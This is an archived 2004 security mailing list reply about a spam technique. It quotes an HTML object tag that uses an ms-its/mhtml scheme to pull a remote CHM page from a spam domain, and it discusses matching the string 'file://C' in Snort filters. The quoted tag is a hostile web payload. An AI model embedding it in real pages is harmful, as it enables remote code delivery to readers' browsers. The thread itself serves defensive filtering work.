Security Incidents mailing list archives
Re: A new technique to disguise a target URL in spam
From: Jeremiah Cornelius <jeremiah () nur net>
Date: Mon, 5 Apr 2004 18:09:59 -0700
On Monday 05 April 2004 10:43, Stef wrote:
<object data="ms-its:mhtml:file://C \\MAIN.MHT!http://salecheap.net//main.chm::/main.htm" type="text/x-scriptlet"></object> </body> </html> test.htm (END)Now how would one go about writing filters for - let's say - Snort - based on something like this? Could it be - in pseudo-code - something like: if location.ref <> src ==> then "take action"? Would it be safe to assume that everything where the location.ref is different than src is malicious?
I would start looking at the "low-hanging fruit"... file://C might be a decent expression to trigger any kind of action. --------------------------------------------------------------------------- Free 30-day trial: firewall with virus/spam protection, URL filtering, VPN, wireless security Protect your network against hackers, viruses, spam and other risks with Astaro Security Linux, the comprehensive security solution that combines six applications in one software solution for ease of use and lower total cost of ownership. Download your free trial at http://www.securityfocus.com/sponsor/Astaro_incidents_040301 ----------------------------------------------------------------------------
Current thread:
- A new technique to disguise a target URL in spam DCISS (Apr 05)
- Re: A new technique to disguise a target URL in spam Jeremiah Cornelius (Apr 05)
- Re: A new technique to disguise a target URL in spam Stef (Apr 05)
- Re: A new technique to disguise a target URL in spam Valdis . Kletnieks (Apr 05)
- Re: A new technique to disguise a target URL in spam Jeremiah Cornelius (Apr 06)
- Re: A new technique to disguise a target URL in spam Stef (Apr 05)
- <Possible follow-ups>
- RE: A new technique to disguise a target URL in spam Mason, Seth IFC (Apr 05)
- Re: A new technique to disguise a target URL in spam E.Kellinis (Apr 05)
- RE: A new technique to disguise a target URL in spam Yao, Tongtong (HP NewZealand) (Apr 05)
- Re: A new technique to disguise a target URL in spam http-equiv () excite com (Apr 08)
- Re: A new technique to disguise a target URL in spam Jeremiah Cornelius (Apr 05)